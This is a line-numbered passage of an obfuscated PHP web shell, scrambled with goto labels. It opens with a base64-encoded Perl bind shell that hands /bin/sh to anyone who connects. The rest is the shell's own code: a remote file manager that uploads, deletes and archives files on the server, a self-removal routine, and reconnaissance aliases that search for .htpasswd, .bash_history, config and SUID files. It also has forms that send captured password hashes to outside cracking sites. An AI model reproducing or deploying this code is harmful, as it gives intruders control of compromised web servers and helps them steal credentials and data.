"IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1713 goto a71ee;
1714 b9677:
1715}
1716goto E6855;
1717a00d4:
1718if ($os == 'win') {
1719 $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all");
1720} else {
1721 $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv");
1722}
1723goto d95ad;
1724acd2d:
1725@ini_set('log_errors', 0);
1726goto e6160;
1727B43e1:
1728function actionSelfRemove()
1729{
1730 goto Cf78d;
1731 Cf963:
1732 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1733 goto F282b;
1734 c00db:
1735 if ($_POST['p1'] != 'yes') {
1736 LoJWfHeader();
1737 }
1738 goto Cf963;
1739 F282b:
1740 LoJWfFooter();
1741 goto Ed75c;
1742 Cf78d:
1743 if ($_POST['p1'] == 'yes') {
1744 if (@unlink(preg_replace('!\\(\\d+\\)\\s.*!', '', __FILE__))) {
1745 die('Shell has been removed');
1746 } else {
1747 echo 'unlink error!';
1748 }
1749 }
1750 goto c00db;
1751 Ed75c:
1752}
1753goto C5790;
1754B1eb7:
1755function actionFilesMan()
1756{
1757 goto f4c29;
1758 edcef:
1759 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
1760 goto E4eda;
1761 a76a5:
1762 function LoJWfCmp($a, $b)
1763 {
1764 if ($GLOBALS['sort'][0] != 'size') {
1765 return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
1766 } else {
1767 return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
1768 }
1769 }
1770 goto e1ffe;
1771 d4c87:
1772 if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) {
1773 echo "<option value='paste'>Paste / Compress</option>";
1774 }
1775 goto Ea916;
1776 fcc4a:
1777 global $sort;
1778 goto f8f19;
1779 a5cea:
1780 if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && ($_COOKIE['act'] == 'zip' || $_COOKIE['act'] == 'tar')) {
1781 echo "file name: <input type=text name=p2 value='LoJWf_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "'> ";
1782 }
1783 goto A503a;
1784 f4016:
1785 echo "<tr><td colspan=7>\r\n\t<input type=hidden name=a value='FilesMan'>\r\n\t<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>\r\n\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n\t<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
1786 goto e23d5;
1787 Caaec:
1788 e4d41:
1789 goto f4016;
1790 f1f93:
1791 $dirContent = LoJWfScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
1792 goto a97ea;
1793 e1ffe:
1794 usort($files, "LoJWfCmp");
1795 goto eff6e;
1796 C999f:
1797 $GLOBALS['sort'] = $sort;
1798 goto a76a5;
1799 feb5e:
1800 $l = 0;
1801 goto c7fdd;
1802 F87c2:
1803 Edebd:
1804 goto ab0b8;
1805 f8f19:
1806 $sort = array('name', 1);
1807 goto cbeaa;
1808 b010c:
1809 if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) {
1810 $files[] = array_merge($tmp, array('type' => 'file'));
1811 } elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) {
1812 $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
1813 } elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i])) {
1814 $dirs[] = array_merge($tmp, array('type' => 'dir'));
1815 }
1816 goto c8c9e;
1817 c8c9e:
1818 b713e:
1819 goto bc611;
1820 E4eda:
1821 $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => LoJWfPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i]));
1822 goto b010c;
1823 d759a:
1824 $files = array_merge($dirs, $files);
1825 goto feb5e;
1826 f4c29:
1827 if (!empty($_COOKIE['f'])) {
1828 $_COOKIE['f'] = @unserialize($_COOKIE['f']);
1829 }
1830 goto C4e02;
1831 e822b:
1832 echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
1833 goto f1f93;
1834 e439e:
1835 LoJWfHeader();
1836 goto e822b;
1837 F6a49:
1838 LoJWfFooter();
1839 goto c72e1;
1840 eff6e:
1841 usort($dirs, "LoJWfCmp");
1842 goto d759a;
1843 c7fdd:
1844 foreach ($files as $f) {
1845 goto Eb369;
1846 E06ec:
1847 $l = $l ? 0 : 1;
1848 goto Bede4;
1849 Bede4:
1850 Bb442:
1851 goto e43a3;
1852 Eb369:
1853 echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . ($f['type'] == 'file' ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . ($f['type'] == 'file' ? LoJWfViewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . ($f['type'] == 'file' ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>';
1854 goto E06ec;
1855 e43a3:
1856 }
1857 goto Caaec;
1858 a97ea:
1859 if ($dirContent === false) {
1860 goto Bd998;
1861 Bd998:
1862 echo 'Can\'t open this folder!';
1863 goto E26a3;
1864 A18bf:
1865 return;
1866 goto a9934;
1867 E26a3:
1868 LoJWfFooter();
1869 goto A18bf;
1870 a9934:
1871 }
1872 goto fcc4a;
1873 bef7c:
1874 echo "<script>\r\n\tfunction sa() {\r\n\t\tfor(i=0;i<d.files.elements.length;i++)\r\n\t\t\tif(d.files.elements[i].type == 'checkbox')\r\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\r\n\t}\r\n</script>\r\n<table width='100%' class='main' cellspacing='0' cellpadding='2'>\r\n<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>";
1875 goto a067e;
1876 B9fa2:
1877 $n = count($dirContent);
1878 goto b81b4;
1879 F93e5:
1880 goto Edebd;
1881 goto Ca3ec;
1882 a067e:
1883 $dirs = $files = array();
1884 goto B9fa2;
1885 Ea916:
1886 echo "</select> ";
1887 goto a5cea;
1888 A503a:
1889 echo "<input type='submit' value='>>'></td></tr></form></table></div>";
1890 goto F6a49;
1891 B89d5:
1892 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
1893 goto edcef;
1894 cbeaa:
1895 if (!empty($_POST['p1'])) {
1896 if (preg_match('!s_([A-z]+)_(\\d{1})!', $_POST['p1'], $match)) {
1897 $sort = array($match[1], (int) $match[2]);
1898 }
1899 }
1900 goto bef7c;
1901 b81b4:
1902 $i = 0;
1903 goto F87c2;
1904 e23d5:
1905 if (class_exists('ZipArchive')) {
1906 echo "<option value='zip'>Compress (zip)</option><option value='unzip' selected>Uncompress (unzip)</option>";
1907 }
1908 goto De622;
1909 bc611:
1910 $i++;
1911 goto F93e5;
1912 ab0b8:
1913 if (!($i < $n)) {
1914 goto F9a47;
1915 }
1916 goto B89d5;
1917 C4e02:
1918 if (!empty($_POST['p1'])) {
1919 goto Dc4f1;
1920 a61af:
1921 b8fb3:
1922 goto f63c5;
1923 Dc4f1:
1924 switch ($_POST['p1']) {
1925 case 'uploadFile':
1926 if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) {
1927 echo "Can't upload file!";
1928 }
1929 goto b8fb3;
1930 case 'mkdir':
1931 if (!@mkdir($_POST['p2'])) {
1932 echo "Can't create new dir";
1933 }
1934 goto b8fb3;
1935 case 'delete':
1936 goto eb1d9;
1937 b9bd4:
1938 if (is_array(@$_POST['f'])) {
1939 foreach ($_POST['f'] as $f) {
1940 goto a2658;
1941 E07c7:
1942 $f = urldecode($f);
1943 goto ad967;
1944 bf909:
1945 b312e:
1946 goto E85ef;
1947 a2658:
1948 if ($f == '..') {
1949 goto b312e;
1950 }
1951 goto E07c7;
1952 ad967:
1953 if (is_dir($f)) {
1954 deleteDir($f);
1955 } else {
1956 @unlink($f);
1957 }
1958 goto bf909;
1959 E85ef:
1960 }
1961 a2750:
1962 }
1963 goto D58bd;
1964 D58bd:
1965 goto b8fb3;
1966 goto E50b3;
1967 eb1d9:
1968 function deleteDir($path)
1969 {
1970 goto Cfe75;
1971 e3f5e:
1972 if (!(($item = readdir($dh)) !== false)) {
1973 goto B34e8;
1974 }
1975 goto Ba521;
1976 E9d65:
1977 $dh = opendir($path);
1978 goto F1998;
1979 Ba521:
1980 $item = $path . $item;
1981 goto F1ed7;
1982 Cfe75:
1983 $path = substr($path, -1) == '/' ? $path : $path . '/';
1984 goto E9d65;
1985 b98b8:
1986 goto F65e0;
1987 goto dde4f;
1988 F1998:
1989 F65e0:
1990 goto e3f5e;
1991 fc842:
1992 if ($type == "dir") {
1993 deleteDir($item);
1994 } else {
1995 @unlink($item);
1996 }
1997 goto b98b8;
1998 F1ed7:
1999 if (basename($item) == ".." || basename($item) == ".") {
2000 goto F65e0;
2001 }
2002 goto d5226;
2003 C313d:
2004 @rmdir($path);
2005 goto a416d;
2006 d5226:
2007 $type = filetype($item);
2008 goto fc842;
2009 D1cca:
2010 closedir($dh);
2011 goto C313d;
2012 dde4f:
2013 B34e8:
2014 goto D1cca;
2015 a416d:
2016 }
2017 goto b9bd4;
2018 E50b3:
2019 case 'paste':
2020 goto fe58f;
2021 fe58f:
2022 if ($_COOKIE['act'] == 'copy') {
2023 goto Fccd6;
2024 Fccd6:
2025 function copy_paste($c, $s, $d)
2026 {
2027 if (is_dir($c . $s)) {
2028 goto F42e5;
2029 bc1e9:
2030 b0c88:
2031 goto C4e6d;
2032 d5d01:
2033 $h = @opendir($c . $s);
2034 goto aa694;
2035 F42e5:
2036 mkdir($d . $s);
2037 goto d5d01;
2038 a9cfa:
2039 goto B70c8;
2040 goto bc1e9;
2041 Fc261:
2042 if ($f != "." and $f != "..") {
2043 copy_paste($c . $s . '/', $f, $d . $s . '/');
2044 }
2045 goto a9cfa;
2046 aa694:
2047 B70c8:
2048 goto dbf84;
2049 dbf84:
2050 if (!(($f = @readdir($h)) !== false)) {
2051 goto b0c88;
2052 }
2053 goto Fc261;
2054 C4e6d:
2055 } elseif (is_file($c . $s)) {
2056 @copy($c . $s, $d . $s);
2057 }
2058 }
2059 goto b612a;
2060 b81c3:
2061 c815b:
2062 goto Bb112;
2063 b612a:
2064 foreach ($_COOKIE['f'] as $f) {
2065 copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']);
2066 eb92d:
2067 }
2068 goto b81c3;
2069 Bb112:
2070 } elseif ($_COOKIE['act'] == 'move') {
2071 goto Bb2ef;
2072 Bb2ef:
2073 function move_paste($c, $s, $d)
2074 {
2075 if (is_dir($c . $s)) {
2076 goto C4b91;
2077 E00ae:
2078 goto f27f0;
2079 goto d6365;
2080 C4b91:
2081 mkdir($d . $s);
2082 goto Ffd3b;
2083 A2424:
2084 if (!(($f = @readdir($h)) !== false)) {
2085 goto a6715;
2086 }
2087 goto F44af;
2088 a6834:
2089 f27f0:
2090 goto A2424;
2091 F44af:
2092 if ($f != "." and $f != "..") {
2093 copy_paste($c . $s . '/', $f, $d . $s . '/');
2094 }
2095 goto E00ae;
2096 d6365:
2097 a6715:
2098 goto aa400;
2099 Ffd3b:
2100 $h = @opendir($c . $s);
2101 goto a6834;
2102 aa400:
2103 } elseif (@is_file($c . $s)) {
2104 @copy($c . $s, $d . $s);
2105 }
2106 }
2107 goto b2976;
2108 b2976:
2109 foreach ($_COOKIE['f'] as $f) {
2110 @rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f);
2111 e127a:
2112 }
2113 goto b15bd;
2114 b15bd:
2115 cbc29:
2116 goto a01e3;
2117 a01e3:
2118 } elseif ($_COOKIE['act'] == 'zip') {
2119 if (class_exists('ZipArchive')) {
2120 $zip = new ZipArchive();
2121 if ($zip->open($_POST['p2'], 1)) {
2122 goto Fedc6;
2123 f6986:
2124 foreach ($_COOKIE['f'] as $f) {
2125 goto c4cdd;
2126 fb172:
2127 fee48:
2128 goto Cb8c8;
2129 Be951:
2130 if (@is_file($_COOKIE['c'] . $f)) {
2131 $zip->addFile($_COOKIE['c'] . $f, $f);
2132 } elseif (@is_dir($_COOKIE['c'] . $f)) {
2133 goto eeb69;
2134 Aeba1:
2135 foreach ($iterator as $key => $value) {
2136 $zip->addFile(realpath($key), $key);
2137 Bc1e4:
2138 }
2139 goto B10b1;
2140 eeb69:
2141 $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/', FilesystemIterator::SKIP_DOTS));
2142 goto Aeba1;
2143 B10b1:
2144 c49c0:
2145 goto f016a;
2146 f016a:
2147 }
2148 goto fb172;
2149 c4cdd:
2150 if ($f == '..') {
2151 goto fee48;
2152 }
2153 goto Be951;
2154 Cb8c8:
2155 }
2156 goto ad5f9;
2157 ad5f9:
2158 Dbedb:
2159 goto De8c3;
2160 Ad6ca:
2161 $zip->close();
2162 goto A13d8;
2163 De8c3:
2164 chdir($GLOBALS['cwd']);
2165 goto Ad6ca;
2166 Fedc6:
2167 chdir($_COOKIE['c']);
2168 goto f6986;
2169 A13d8:
2170 }
2171 }
2172 } elseif ($_COOKIE['act'] == 'unzip') {
2173 if (class_exists('ZipArchive')) {
2174 goto C8144;
2175 E8156:
2176 foreach ($_COOKIE['f'] as $f) {
2177 if ($zip->open($_COOKIE['c'] . $f)) {
2178 $zip->extractTo($GLOBALS['cwd']);
2179 $zip->close();
2180 }
2181 A6765:
2182 }
2183 goto e67bb;
2184 e67bb:
2185 C9aba:
2186 goto D2ae1;
2187 C8144:
2188 $zip = new ZipArchive();
2189 goto E8156;
2190 D2ae1:
2191 }
2192 } elseif ($_COOKIE['act'] == 'tar') {
2193 goto ccf8a;
2194 E0518:
2195 $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
2196 goto C92c7;
2197 ccf8a:
2198 chdir($_COOKIE['c']);
2199 goto E0518;
2200 C92c7:
2201 LoJWfEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
2202 goto ec23f;
2203 ec23f:
2204 chdir($GLOBALS['cwd']);
2205 goto F9d3c;
2206 F9d3c:
2207 }
2208 goto F468d;
2209 D5eee:
2210 setcookie('f', '', time() - 3600);
2211 goto Ea74c;
2212 F468d:
2213 unset($_COOKIE['f']);
2214 goto D5eee;
2215 Ea74c:
2216 goto b8fb3;
2217 goto d8652;
2218 d8652:
2219 default:
2220 if (!empty($_POST['p1'])) {
2221 goto C51fe;
2222 f40a3:
2223 LoJWfsetcookie('f', serialize(@$_POST['f']));
2224 goto Eb60e;
2225 C51fe:
2226 LoJWfsetcookie('act', $_POST['p1']);
2227 goto f40a3;
2228 Eb60e:
2229 LoJWfsetcookie('c', @$_POST['c']);
2230 goto Afed1;
2231 Afed1:
2232 }
2233 goto b8fb3;
2234 }
2235 goto b5221;
2236 b5221:
2237 D8835:
2238 goto a61af;
2239 f63c5:
2240 }
2241 goto e439e;
2242 Ca3ec:
2243 F9a47:
2244 goto C999f;
2245 De622:
2246 echo "<option value='tar'>Compress (tar.gz)</option>";
2247 goto d4c87;
2248 c72e1:
2249}
2250goto e25f5;
2251a8329:
2252$default_charset = 'Windows-1251';
2253goto E0cac;
2254Adf01:
2255function LoJWfsetcookie($k, $v)
2256{
2257 $_COOKIE[$k] = $v;
2258 setcookie($k, $v);
2259}
2260goto B3a61;
2261cb151:
2262function LoJWfPermsColor($f)
2263{
2264 if (!@is_readable($f)) {
2265 return '<font color=#FF0000>' . LoJWfPerms(@fileperms($f)) . '</font>';
2266 } elseif (!@is_writable($f)) {
2267 return '<font color=white>' . LoJWfPerms(@fileperms($f)) . '</font>';
2268 } else {
2269 return '<font color=#25ff00>' . LoJWfPerms(@fileperms($f)) . '</font>';
2270 }
2271}
2272goto a83b4;
2273d35bc:
2274@set_time_limit(0);
2275goto ac31d;
2276ac31d:
2277if (get_magic_quotes_gpc()) {
2278 goto acd79;
2279 e7bcd:
2280 $_COOKIE = LoJWfstripslashes($_COOKIE);
2281 goto C50b4;
2282 a5050:
2283 $_POST = LoJWfstripslashes($_POST);
2284 goto e7bcd;
2285 acd79:
2286 function LoJWfstripslashes($array)
2287 {
2288 return is_array($array) ? array_map('LoJWfstripslashes', $array) : stripslashes($array);
2289 }
2290 goto a5050;
2291 C50b4:
2292}
2293goto d9378;
2294e25f5:
2295function actionStringTools()
2296{
2297 goto Bda96;
2298 cfc4f:
2299 if (!empty($_POST['p1'])) {
2300 if (in_array($_POST['p1'], $stringTools)) {
2301 echo htmlspecialchars($_POST['p1']($_POST['p2']));
2302 }
2303 }
2304 goto d2043;
2305 c1c7d:
2306 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '') . "margin-top:5px' id='strOutput'>";
2307 goto cfc4f;
2308 D8fdc:
2309 LoJWfFooter();
2310 goto df676;
2311 Bda96:
2312 if (!function_exists('hex2bin')) {
2313 function hex2bin($p)
2314 {
2315 return decbin(hexdec($p));
2316 }
2317 }
2318 goto b868e;
2319 E20ed:
2320 if (!function_exists('ascii2hex')) {
2321 function ascii2hex($p)
2322 {
2323 goto e4d08;
2324 e95de:
2325 goto d2caf;
2326 goto bfb28;
2327 f96d9:
2328 $r .= sprintf('%02X', ord($p[$i]));
2329 goto c3677;
2330 bfb28:
2331 d70f0:
2332 goto a29ef;
2333 Dbec7:
2334 ++$i;
2335 goto e95de;
2336 Ab358:
2337 d2caf:
2338 goto e253b;
2339 e7581:
2340 $i = 0;
2341 goto Ab358;
2342 a29ef:
2343 return strtoupper($r);
2344 goto a7056;
2345 e4d08:
2346 $r = '';
2347 goto e7581;
2348 c3677:
2349 D168e:
2350 goto Dbec7;
2351 e253b:
2352 if (!($i < strlen($p))) {
2353 goto d70f0;
2354 }
2355 goto f96d9;
2356 a7056:
2357 }
2358 }
2359 goto Bb926;
2360 Bb926:
2361 if (!function_exists('full_urlencode')) {
2362 function full_urlencode($p)
2363 {
2364 goto aa912;
2365 Fb1dd:
2366 c3ff3:
2367 goto c93bc;
2368 f40f6:
2369 F411c:
2370 goto E6b6d;
2371 D17ad:
2372 E2855:
2373 goto Becf7;
2374 Dfc98:
2375 goto c3ff3;
2376 goto f40f6;
2377 E6b6d:
2378 return strtoupper($r);
2379 goto ef015;
2380 B99de:
2381 $r .= '%' . dechex(ord($p[$i]));
2382 goto D17ad;
2383 Becf7:
2384 ++$i;
2385 goto Dfc98;
2386 fc373:
2387 $i = 0;
2388 goto Fb1dd;
2389 aa912:
2390 $r = '';
2391 goto fc373;
2392 c93bc:
2393 if (!($i < strlen($p))) {
2394 goto F411c;
2395 }
2396 goto B99de;
2397 ef015:
2398 }
2399 }
2400 goto D08f6;
2401 D08f6:
2402 $stringTools = array('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen');
2403 goto A9523;
2404 F7fce:
2405 if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
2406 LoJWfsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
2407 }
2408 goto Ed323;
2409 A9523:
2410 if (isset($_POST['ajax'])) {
2411 goto df109;
2412 df109:
2413 LoJWfsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
2414 goto Cce28;
2415 Cce28:
2416 ob_start();
2417 goto f553a;
2418 f553a:
2419 if (in_array($_POST['p1'], $stringTools)) {
2420 echo $_POST['p1']($_POST['p2']);
2421 }
2422 goto E7a05;
2423 E7a05:
2424 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
2425 goto Afee2;
2426 Afee2:
2427 echo strlen($temp), "\n", $temp;
2428 goto f69cf;
2429 f69cf:
2430 exit;
2431 goto Bc6a2;
2432 Bc6a2:
2433 }
2434 goto F7fce;
2435 a2628:
2436 foreach ($stringTools as $k => $v) {
2437 echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>";
2438 f3c91:
2439 }
2440 goto dc067;
2441 Ed323:
2442 LoJWfHeader();
2443 goto e3958;
2444 af884:
2445 if (@$_POST['p3']) {
2446 LoJWfRecursiveGlob($_POST['c']);
2447 }
2448 goto ab512;
2449 cdaeb:
2450 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
2451 goto a2628;
2452 d2043:
2453 echo "</pre></div><br><h1>Search files:</h1><div class=content>\r\n\t\t<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>\r\n\t\t\t<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\r\n\t\t\t<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td></tr>\r\n\t\t\t<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>\r\n\t\t\t<tr><td></td><td><input type='submit' value='>>'></td></tr>\r\n\t\t\t</table></form>";
2454 goto Fda6b;
2455 Fda6b:
2456 function LoJWfRecursiveGlob($path)
2457 {
2458 goto A09ff;
2459 Cf538:
2460 if (is_array($paths) && @count($paths)) {
2461 foreach ($paths as $item) {
2462 if (@is_dir($item)) {
2463 if ($path != $item) {
2464 LoJWfRecursiveGlob($item);
2465 }
2466 } else {
2467 if (empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2']) !== false) {
2468 echo "<a href='#' onclick='g(\"FilesTools\",null,\"" . urlencode($item) . "\", \"view\",\"\")'>" . htmlspecialchars($item) . "</a><br>";
2469 }
2470 }
2471 D31f3:
2472 }
2473 dff55:
2474 }
2475 goto b4eed;
2476 A311c:
2477 $paths = @array_unique(@array_merge(@glob($path . $_POST['p3']), @glob($path . '*', GLOB_ONLYDIR)));
2478 goto Cf538;
2479 A09ff:
2480 if (substr($path, -1) != '/') {
2481 $path .= '/';
2482 }
2483 goto A311c;
2484 b4eed:
2485 }
2486 goto af884;
2487 b868e:
2488 if (!function_exists('binhex')) {
2489 function binhex($p)
2490 {
2491 return dechex(bindec($p));
2492 }
2493 }
2494 goto c686f;
2495 dc067:
2496 Db4b3:
2497 goto c1c7d;
2498 e3958:
2499 echo '<h1>String conversions</h1><div class=content>';
2500 goto cdaeb;
2501 ab512:
2502 echo "</div><br><h1>Search for hash:</h1><div class=content>\r\n\t\t<form method='post' target='_blank' name='hf'>\r\n\t\t\t<input type='text' name='hash' style='width:200px;'><br>\r\n <input type='hidden' name='act' value='find'/>\r\n\t\t\t<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>\r\n\t\t\t<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>\r\n <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>\r\n\t\t</form></div>";
2503 goto D8fdc;
2504 c686f:
2505 if (!function_exists('hex2ascii')) {
2506 function hex2ascii($p)
2507 {
